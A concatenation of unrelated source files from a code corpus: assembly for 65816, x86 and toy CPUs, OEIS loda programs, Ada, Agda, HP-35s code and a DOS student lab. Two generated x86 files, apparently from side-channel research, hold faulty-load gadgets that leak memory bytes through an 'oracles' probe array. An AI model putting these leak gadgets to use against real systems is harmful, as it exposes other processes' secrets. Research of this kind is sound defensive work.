; if it is, go to (next) + LDA KEYB_KEYCACHE.W,X ; get old key cache value BNE ++++ ; key already down? go to ++++ STZ KEYB_KEYDOWNTICKS&$FF.B ; zero out key down ticks STY KEYB_KEYDOWN&$FF.B ; store new current key STX KEYB_KEYDOWNX&$FF.B ; and "scan code" LDA #$FF ; load #$FF again to store to STA KEYB_NEWKEYPRESSED&$FF.B ; "new key pressed" BRA _f ; skip some redundant insrts + LDA KEYB_TMP_NMI&$FF.B ; check NMI timer BEQ ++ ; increase key down ticks __ INC KEYB_KEYDOWNTICKS&$FF.B ; only if NMI timer <>0 ++ LDA #$FF ; load #$FF again to store to BRA ++++ ; cache, and go to ++++ +++ CPX KEYB_KEYDOWNX&$FF.B ; key up is "current code"? BNE ++++ ; if not, skip STZ KEYB_KEYDOWN&$FF.B ; \ zero out "current code" DEC (KEYB_KEYDOWNX+1)&$FF.B ; cur. "scan" = $FFxx (invalid) ++++ LDX KEYB_TMP2&$FF.B ; restore original shifted X STA KEYB_KEYCACHE.W,X ; store $00 or $FF to cache LDA KEYB_TMP&$FF.B ; restore remaining bits INX STX KEYB_TMP2&$FF.B .ENDR LDX KEYB_TMP3&$FF.B ; restore unshifted X DEX BMI @KEYLOOPEND JMP @KEYLOOP @KEYLOOPEND: PLY PLX STZ KEYB_NMI_TIMER&$FF.B EXITKEYBRAM PLP RTS .ORG $7FE8 KEYB_GET_MODIFIERS_TRAMPOLINE: JSR KEYB_GET_MODIFIERS.W RTL .ORG $7FEC KEYB_INC_NMI_TIMER_TRAMPOLINE: JSR KEYB_INC_NMI_TIMER.W RTL .ORG $7FF0 KEYB_UPDATE_KEYS_IMMEDIATE_TRAMPOLINE: JSR KEYB_UPDATE_KEYS_IMMEDIATE.W RTL .ORG $7FF4 KEYB_GET_PRESSED_KEY_TRAMPOLINE: JSR KEYB_GET_PRESSED_KEY.W RTL .ORG $7FF8 KEYB_RESET_BUFFER_TRAMPOLINE: JSR KEYB_RESET_BUFFER.W RTL .ORG $7FFC KEYB_UPDATE_KEYS_TRAMPOLINE: JSR KEYB_UPDATE_KEYS.W RTL
programs/oeis/106/A106154.asm	neoneye/loda	22	165110	; A106154: Generation 5 of the substitution 1->{2, 1, 2}, 2->{3, 2, 3}, 3->{4, 3, 4}, 4->{5, 4, 5}, 5->{6, 5, 6}, 6->{1, 6, 1}, starting with 1. ; 6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,4,3,4,3,2,3,4,3,4,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,6,5,6,5,4,5,6,5,6,5,4,5,4,3,4,5,4,5,4,3,4,3,2,3,4,3,4,5 seq $0,62756 ; Number of 1's in ternary (base-3) expansion of n. sub $1,$0 add $1,6 mov $0,$1
src/asf-requests-tools.ads	Letractively/ada-asf	0	13081	<filename>src/asf-requests-tools.ads ----------------------------------------------------------------------- -- asf.requests.tools -- ASF Requests Tools -- Copyright (C) 2010 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- package ASF.Requests.Tools is -- Builds a printable representation of the request for debugging purposes. -- When <b>Html</b> is true, the returned content contains an HTML presentation. function To_String (Req : in Request'Class; Html : in Boolean := False; Print_Headers : in Boolean := True; Print_Attributes : in Boolean := False) return String; -- Set the internal context associated with a request: -- <ul> -- <li>The servlet that processes the request, -- <li>The response associated with the request -- </ul/ procedure Set_Context (Req : in out Request'Class; Servlet : access ASF.Servlets.Servlet'Class; Response : in ASF.Responses.Response_Access); end ASF.Requests.Tools;
programs/oeis/168/A168187.asm	neoneye/loda	22	165092	<reponame>neoneye/loda<gh_stars>10-100 ; A168187: a(n) = n^3*(n^6 + 1)/2. ; 0,1,260,9855,131104,976625,5038956,20176975,67109120,193710609,500000500,1178974511,2579891040,5302250785,10330524764,19221681375,34359740416,59293940705,99179648100,161343852319,256000004000,397140027921,603634614220,900576336815,1320903777024,1907348640625,2714751848276,3812798752335,5289227987680,7253573000129,9841500013500,13219811095231,17592186060800,23205742218945,30358496402884,39407819357375,50779978357536,64980869922865,82608050658860,104364180609039,131072000032000,163690967231441,203335691961780,251296306008175,309060919797344,378340321334625,461095081383196,559565236603295,676302730352640,814206799014049,976562500062500,1167082586611551,1389952941888160,1649881795975505,1952152956235404,2302683292075375,2708084724160256,3175730977784625,3713829369920020,4331497909430159,5038848000108000,5847073046530561,6768543273250940,7816907078551935,9007199254872064,10355956419082625,11881340007043716,13603267198297855,15543550148372000,17726043917952369,20176803500171500,22924250359403471,25999348907301120,29435793354328465,33270205387742324,37542343139859375,42295321923508576,47575847224813985,53434460456879580,59925797991555679,67108864000256000,75047317648765281,83809775205129700,93470127634056095,104107874265761184,115808473141908625,128663708656149836,142772077121844015,158239190914773760,175178201854095089,193710244500364500,213964900065270991,236080681643667680,260205541494645825,286497401114723644,315124704862733375,346266997912682496,380115529327738945,416873881065545540,456758623742305599 mov $1,$0 pow $0,9 pow $1,3 add $0,$1 div $0,2
examples/W/W.asm	brickpool/hp35s	3	87699	<reponame>brickpool/hp35s ; Day of the week for any date since September 14, 1752 MODEL P35S SEGMENT CODE LBL W ; program W ; REGZ = dd ; REGY = mm ; REGX = yyyy STO A ; A = y Rv ; f = IP(1/REGX+0.5) ENTER 1/x 0.5 + IP ; REGX is 1 if January or February, otherwise 0 STO- A ; A = y - REGX 12 * + ; if January or February then REGX = m+12 else REGX = m+0 ; n1 = IP(13/5(m+1)) 1 + ; REGX = m + 1 ; 2.6 IP ; REGY = d, REGX = n1 + x<> A ; A = d + n1, REGX = y ; n2 = IP(5/4y) ENTER ENTER ENTER 1.25 IP ; REGX = n2 STO+ A ; A = d + n1 + n2 ; n3 = IP(y/100) Rv 100 / IP ; REGX = n3 STO- A ; A = d + n1 + n2 - n3 ; n4 = IP(y/400) Rv 400 / IP ; REGX = n4 RCL+ A ; REGX = d + n1 + n2 - n3 + n4 7 RMDR ; REGX = (d + n1 + n2 - n3 + n4) mod 7 ; REGX = w RTN ENDS END ; CK=8DE1 ; LN=137
test/Succeed/Issue1436-7.agda	shlevy/agda	1,989	11286	<reponame>shlevy/agda postulate F : Set₂ → Set₃ #_ : Set₁ → Set₂ !_ : Set₀ → Set₁ infix 1 F infix 2 #_ infix 3 !_ syntax F x = ! x ok₁ : Set₁ → Set₃ ok₁ X = ! # X ok₂ : Set₀ → Set₂ ok₂ X = # ! X
asm/testy4.asm	icefoxen/lang	0	14642	; Compile WITH: ; nasm -f elf testy4.asm ; gcc testy4.o ; For some weird weird diseased wrong reason, you have to run the object file ; through gcc, it doesn't work alone with ld. I think it has something to do ; with how it sets up the _start procedure. global main segment .data segment .bss segment .docstring maindoc db "Foody foody foo!", 0 segment .text main: ; This instruction is necessary if you don't want a segfault ;enter 0, 0 ; This one is optional but it's good to save the old state... ;pusha push eax push ebx pop ebx pop eax ; the mov isn't necessary, but it's a good thing to leave ; memory in a consistant state. ;mov eax, 0 ;leave ret
oeis/021/A021507.asm	neoneye/loda-programs	11	18440	<gh_stars>10-100 ; A021507: Decimal expansion of 1/503. ; Submitted by <NAME>(s1.) ; 0,0,1,9,8,8,0,7,1,5,7,0,5,7,6,5,4,0,7,5,5,4,6,7,1,9,6,8,1,9,0,8,5,4,8,7,0,7,7,5,3,4,7,9,1,2,5,2,4,8,5,0,8,9,4,6,3,2,2,0,6,7,5,9,4,4,3,3,3,9,9,6,0,2,3,8,5,6,8,5,8,8,4,6,9,1,8,4,8,9,0,6,5,6,0,6,3,6,1 add $0,1 mov $1,10 pow $1,$0 div $1,503 mov $0,$1 mod $0,10
kernel/int/syscall.asm	ethan4984/rock	207	164459	<filename>kernel/int/syscall.asm %macro pushall 0 push rax push rbx push rcx push rdx push rbp push rdi push rsi push r8 push r9 push r10 push r11 push r12 push r13 push r14 push r15 %endmacro %macro popall 0 pop r15 pop r14 pop r13 pop r12 pop r11 pop r10 pop r9 pop r8 pop rsi pop rdi pop rbp pop rdx pop rcx pop rbx pop rax %endmacro global syscall_main extern syscall_view syscall_main: swapgs mov qword [gs:16], rsp ; save user stack mov rsp, qword [gs:8] ; init kernel stack sti push rcx ; rip push r11 ; rflags push 0x1b ; ss push qword [gs:16] ; rsp push r11 ; rflags push 0x23 ; cs push rcx ; rip push 0 push 0 pushall mov rdi, rsp call syscall_view popall add rsp, 56 pop r11 ; rflags pop rcx ; rip cli mov rdx, qword [gs:24] ; errno mov rsp, qword [gs:16] ; user stack swapgs o64 sysret ; ensure rex.w=1
kernel_entry/kernel_entry.asm	Mollenthe4th/OS	0	84311	global _start; [bits 32] _start: [extern kernel_main] call kernel_main jmp $
test2.asm	jbush001/MiteCPU	12	245379	# # Store values into a memory array # res result res count res buffer, 8 res ptr start: ldi 8 st count ldi buffer st ptr loop: ldi 0 # Clear accumulator add count # Copy count into accumulator index ptr # Load destination pointer st 0 # Store count into destination pointer ldi 1 add ptr st ptr # Increment pointer ldi -1 add count # Decrement count st count # Update count bl done # Finished? if so, branch out ldi -1 # Branch unconditionally bl loop # loop again done: ldi -1 bl done # Infinite loop
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_886.asm	ljhsiun2/medusa	9	25255	.global s_prepare_buffers s_prepare_buffers: push %r11 push %r12 push %r14 push %rax push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x19b14, %rsi lea addresses_WC_ht+0x4d34, %rdi nop nop nop nop xor $9257, %rax mov $90, %rcx rep movsq nop nop nop nop nop inc %rbx lea addresses_normal_ht+0x131f8, %rsi lea addresses_D_ht+0x170e4, %rdi xor %r14, %r14 mov $33, %rcx rep movsb nop nop nop nop cmp %rbx, %rbx lea addresses_A_ht+0x1c034, %rsi lea addresses_A_ht+0x2934, %rdi nop nop nop nop add %r11, %r11 mov $2, %rcx rep movsw nop nop nop nop nop dec %rbx lea addresses_UC_ht+0x4934, %rbx nop nop nop nop sub $39546, %r14 mov (%rbx), %esi sub $7339, %rcx lea addresses_A_ht+0x19fbc, %rsi lea addresses_WT_ht+0x11d34, %rdi nop nop sub %r12, %r12 mov $5, %rcx rep movsq nop nop nop nop dec %rax lea addresses_WT_ht+0x150b4, %r14 xor $41198, %rsi movups (%r14), %xmm5 vpextrq $0, %xmm5, %rdi nop nop nop nop nop add $7251, %r14 lea addresses_UC_ht+0x136d0, %r12 nop nop nop sub %rcx, %rcx mov (%r12), %rsi nop nop add %rax, %rax lea addresses_A_ht+0x9eac, %r14 clflush (%r14) nop nop nop lfence mov $0x6162636465666768, %r12 movq %r12, (%r14) cmp %rcx, %rcx lea addresses_A_ht+0x14a2c, %r14 nop nop nop nop nop xor $23202, %r11 mov (%r14), %si nop nop xor %rdi, %rdi pop %rsi pop %rdi pop %rcx pop %rbx pop %rax pop %r14 pop %r12 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r13 push %r15 push %rbx push %rsi // Faulty Load lea addresses_A+0xcd34, %r15 xor $63777, %rsi mov (%r15), %bx lea oracles, %r10 and $0xff, %rbx shlq $12, %rbx mov (%r10,%rbx,1), %rbx pop %rsi pop %rbx pop %r15 pop %r13 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_A', 'same': False, 'AVXalign': False, 'congruent': 0}} [Faulty Load] {'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_A', 'same': True, 'AVXalign': False, 'congruent': 0}} <gen_prepare_buffer> {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 2}, 'dst': {'same': True, 'type': 'addresses_WC_ht', 'congruent': 11}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 0}, 'dst': {'same': False, 'type': 'addresses_D_ht', 'congruent': 4}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 4}, 'dst': {'same': False, 'type': 'addresses_A_ht', 'congruent': 9}} {'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 4}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 2}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 11}} {'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 7}} {'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_UC_ht', 'same': True, 'AVXalign': False, 'congruent': 0}} {'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 0}} {'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': True, 'congruent': 2}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
src/numerics-sparse_matrices-n_row.adb	sciencylab/lagrangian-solver	0	4021	separate (Numerics.Sparse_Matrices) function N_Row (Mat : in Sparse_Matrix) return Pos is begin return Mat.N_Row; end N_Row;
Transynther/x86/_processed/NONE/_xt_sm_/i9-9900K_12_0xca_notsx.log_21829_274.asm	ljhsiun2/medusa	9	21483	<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r8 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_WC_ht+0x143b5, %rsi lea addresses_A_ht+0xddf1, %rdi nop nop nop nop nop and $20401, %rbp mov $0, %rcx rep movsw xor %rax, %rax lea addresses_normal_ht+0x1a371, %rcx nop nop nop nop nop sub %r10, %r10 and $0xffffffffffffffc0, %rcx movaps (%rcx), %xmm4 vpextrq $0, %xmm4, %rbp nop nop nop nop and $30277, %rdi lea addresses_normal_ht+0x6b71, %rsi lea addresses_normal_ht+0x546f, %rdi dec %r8 mov $63, %rcx rep movsl nop dec %rcx lea addresses_UC_ht+0x1bb51, %rsi nop nop nop nop cmp $41024, %r10 movb $0x61, (%rsi) nop nop sub $44919, %rsi lea addresses_D_ht+0xcab1, %rsi lea addresses_UC_ht+0xdc2a, %rdi dec %r9 mov $35, %rcx rep movsb sub %r10, %r10 lea addresses_D_ht+0xbb67, %rbp nop nop nop xor $32430, %rdi mov $0x6162636465666768, %rsi movq %rsi, %xmm6 movups %xmm6, (%rbp) nop nop and $37814, %rdi lea addresses_WT_ht+0x4771, %r10 clflush (%r10) nop nop nop nop nop sub $29542, %r8 movw $0x6162, (%r10) nop nop inc %rbp lea addresses_WC_ht+0x4871, %rsi lea addresses_WC_ht+0x10f71, %rdi nop nop cmp $59242, %r9 mov $4, %rcx rep movsl add %rcx, %rcx lea addresses_WT_ht+0x939b, %rsi lea addresses_normal_ht+0x15171, %rdi nop nop nop nop nop cmp %r8, %r8 mov $89, %rcx rep movsw nop nop cmp %r9, %r9 lea addresses_A_ht+0x13f1, %rsi lea addresses_A_ht+0x9b71, %rdi nop nop nop nop dec %rax mov $49, %rcx rep movsq nop nop nop nop nop dec %r9 lea addresses_D_ht+0x4859, %rcx nop nop nop add $26404, %rsi mov (%rcx), %r9d nop cmp %rdi, %rdi pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r9 pop %r8 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r8 push %rax push %rbp push %rbx push %rdi push %rdx // Store lea addresses_A+0x1ccf1, %rbx nop nop nop nop nop dec %rax mov $0x5152535455565758, %r10 movq %r10, (%rbx) nop dec %r8 // Store lea addresses_D+0xeb71, %rbx nop nop nop nop add $32687, %rdi movw $0x5152, (%rbx) nop inc %r10 // Store mov $0xb3b, %rbx nop nop nop nop add %r8, %r8 movb $0x51, (%rbx) nop sub $49543, %r8 // Store lea addresses_WC+0x1025d, %rbp nop nop nop nop dec %rdx movw $0x5152, (%rbp) nop nop nop nop dec %rbp // Load lea addresses_D+0x1c171, %rbp clflush (%rbp) nop nop nop nop cmp $32030, %rax vmovups (%rbp), %ymm0 vextracti128 $1, %ymm0, %xmm0 vpextrq $1, %xmm0, %r8 nop nop nop nop nop sub %rbx, %rbx // Store lea addresses_normal+0xe5d1, %r8 nop nop nop sub $65409, %rax movb $0x51, (%r8) nop nop cmp %rbp, %rbp // Store lea addresses_RW+0xdca1, %rdx nop nop nop nop xor %rdi, %rdi mov $0x5152535455565758, %r8 movq %r8, %xmm3 movups %xmm3, (%rdx) nop nop nop and $64962, %rdi // Faulty Load lea addresses_D+0xeb71, %rbp clflush (%rbp) nop cmp $25622, %rdx movups (%rbp), %xmm2 vpextrq $0, %xmm2, %r8 lea oracles, %rbx and $0xff, %r8 shlq $12, %r8 mov (%rbx,%r8,1), %r8 pop %rdx pop %rdi pop %rbx pop %rbp pop %rax pop %r8 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 0}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_A', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 5}} {'OP': 'STOR', 'dst': {'same': True, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_P', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 1}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_WC', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 9}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 5}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_RW', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 3}} [Faulty Load] {'OP': 'LOAD', 'src': {'same': True, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0}} <gen_prepare_buffer> {'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_WC_ht'}, 'dst': {'same': False, 'congruent': 5, 'type': 'addresses_A_ht'}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_normal_ht', 'NT': False, 'AVXalign': True, 'size': 16, 'congruent': 11}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 11, 'type': 'addresses_normal_ht'}, 'dst': {'same': False, 'congruent': 1, 'type': 'addresses_normal_ht'}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_UC_ht', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 5}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 6, 'type': 'addresses_D_ht'}, 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_UC_ht'}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1}} {'OP': 'STOR', 'dst': {'same': True, 'type': 'addresses_WT_ht', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 5}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 5, 'type': 'addresses_WC_ht'}, 'dst': {'same': False, 'congruent': 10, 'type': 'addresses_WC_ht'}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_WT_ht'}, 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_normal_ht'}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 7, 'type': 'addresses_A_ht'}, 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_A_ht'}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 2}} {'52': 21829} 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 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3-Assemble(80x86)/lab-2/lab2.asm	ftxj/4th-Semester	0	21151	.386 STACK SEGMENT USE16 STACK DB 300 DUP(0) STACK ENDS DATA SEGMENT USE16 N EQU 30 POIN DW 0 BUF DB 'zhangsan', 0, 0 DB 0, 0, 0, ? DB 'lisi', 6 DUP(0) DB 80, 100, 70, ? DB 'B',0,0,0,0,0,0,0,0,0 DB 10, 20, 12, ? DB N-4 DUP('TempValue',0, 80, 90, 95, ?) DB 'xinjie', 0, 0, 0, 0 DB 100, 100, 100, ? IN_NAME DB 10 DB 0 DB 10 DUP(0) STRING DB 300 DUP(0) CRLF DB 0DH, 0AH, '$' MSG1 DB 0AH, 0DH, 'Please Input Name :$' MSG2 DB 0AH, 0DH, 'Not Find This Student!:$' MSG3 DB 'Rank: ' DIVID DB 7 DUP(0) db 7 dup(1) db 7 dup(2) db 7 dup(3) db 7 dup(4) db 7 dup(5) db 7 dup(6) db 7 dup(7) db 7 dup(8) db 7 dup(9) db 7 dup(10) db 7 dup(11) db 7 dup(12) db 7 dup(13) db 7 dup(14) db 7 dup(15) db 7 dup(16) db 7 dup(17) db 7 dup(18) db 7 dup(19) db 7 dup(20) db 7 dup(21) db 7 dup(22) db 7 dup(23) db 7 dup(24) db 7 dup(25) db 7 dup(26) db 7 dup(27) db 7 dup(28) db 7 dup(29) db 7 dup(30) db 7 dup(31) db 7 dup(32) db 7 dup(33) db 7 dup(34) db 7 dup(35) db 7 dup(36) db 7 dup(37) db 7 dup(38) db 7 dup(39) db 7 dup(40) db 7 dup(41) db 7 dup(42) db 7 dup(43) db 7 dup(44) db 7 dup(45) db 7 dup(46) db 7 dup(47) db 7 dup(48) db 7 dup(49) db 7 dup(50) db 7 dup(51) db 7 dup(52) db 7 dup(53) db 7 dup(54) db 7 dup(55) db 7 dup(56) db 7 dup(57) db 7 dup(58) db 7 dup(59) db 7 dup(60) db 7 dup(61) db 7 dup(62) db 7 dup(63) db 7 dup(64) db 7 dup(65) db 7 dup(66) db 7 dup(67) db 7 dup(68) db 7 dup(69) db 7 dup(70) db 7 dup(71) db 7 dup(72) db 7 dup(73) db 7 dup(74) db 7 dup(75) db 7 dup(76) db 7 dup(77) db 7 dup(78) db 7 dup(79) db 7 dup(80) db 7 dup(81) db 7 dup(82) db 7 dup(83) db 7 dup(84) db 7 dup(85) db 7 dup(86) db 7 dup(87) db 7 dup(88) db 7 dup(89) db 7 dup(90) db 7 dup(91) db 7 dup(92) db 7 dup(93) db 7 dup(94) db 7 dup(95) db 7 dup(96) db 7 dup(97) db 7 dup(98) db 7 dup(99) db 7 dup(100) DATA ENDS CODE SEGMENT USE16 ASSUME DS:DATA, CS:CODE, SS:STACK START: MOV AX, DATA MOV DS, AX INPUT: MOV DX, OFFSET MSG1 MOV AH, 9 INT 21H ;功能一一小题 LEA DX, IN_NAME MOV AH, 10 INT 21H ;功能一二小题 MOV BL, IN_NAME + 1 MOV BH, IN_NAME + 2 CMP BL, 0 JE INPUT CMP BH, 'q' JE DIE ;功能一三小题 MOV BH, 0 MOV CX, 10 SUB CX, BX PP: MOV [IN_NAME + BX + 2], 0 INC BX LOOP PP mov ax,0 call TIMER mov cx, 5000 work1: push cx MOV DI, -14 FIND: MOV CX, N ADD DI, 14 FIND_S: MOV EAX, DWORD PTR [IN_NAME + 2] CMP EAX, DWORD PTR [BUF + DI] JNE CON MOV EBX, DWORD PTR [IN_NAME + 6] CMP EBX, DWORD PTR [BUF + DI + 4] JNE CON MOV DX, WORD PTR [IN_NAME + 10] CMP DX, WORD PTR [BUF + DI + 8] JE SUCCESS_FIND CON: CMP CX, 0 JE NOT_FIND LOOP FIND DIE: MOV AH, 4CH INT 21H NOT_FIND: MOV DX, OFFSET MSG2 MOV AH, 9 INT 21H JMP INPUT SUCCESS_FIND: MOV WORD PTR [POIN], OFFSET BUF + 10 ADD WORD PTR [POIN], DI CALL SET_AVERANGE_GRADE pop cx loop work1 mov ax,1 call TIMER CALL G_ABCD JMP INPUT G_ABCD: PUSH AX PUSH DX PUSH SI MOV SI, [POIN] ADD SI, 3 MOV AX, [SI] MOV AH, 0 SUB AL, 90 JS G_BCD MOV DL, 'A' JMP SCREEN G_BCD: MOV AX, [SI] MOV AH, 0 SUB AL, 80 JS G_CD MOV DL, 'B' JMP SCREEN G_CD: MOV AX, [SI] MOV AH, 0 SUB AL, 70 JS G_D MOV DL, 'C' JMP SCREEN G_D: MOV DL, 'D' JMP SCREEN SCREEN: MOV AH, 2 INT 21H POP SI POP DX POP AX RET SET_AVERANGE_GRADE: MOV SI, 10 MOV CX, N MATH: MOV EDX, DWORD PTR [BUF + SI] MOVZX BX, DL ;Chinese Grade SHL BX, 1 MOVZX AX, DH ;MATH GRADE ADD BX, AX SHR EDX, 8 MOV AL, DH ;ENGLISH SHR AX, 1 ADD BX, AX SHL BX, 1 MOVZX AX, BYTE PTR [BX + DIVID] MOV [BUF + SI + 3], AL ADD SI, 14 LOOP MATH RET ;时间计数器(ms),在屏幕上显示程序的执行时间(ms) ;使用方法: ; MOV AX, 0 ;表示开始计时 ; CALL TIMER ; ... ... ;需要计时的程序 ; MOV AX, 1 ; CALL TIMER ;终止计时并显示计时结果(ms) ;输出: 改变了AX和状态寄存器 TIMER PROC PUSH DX PUSH CX PUSH BX 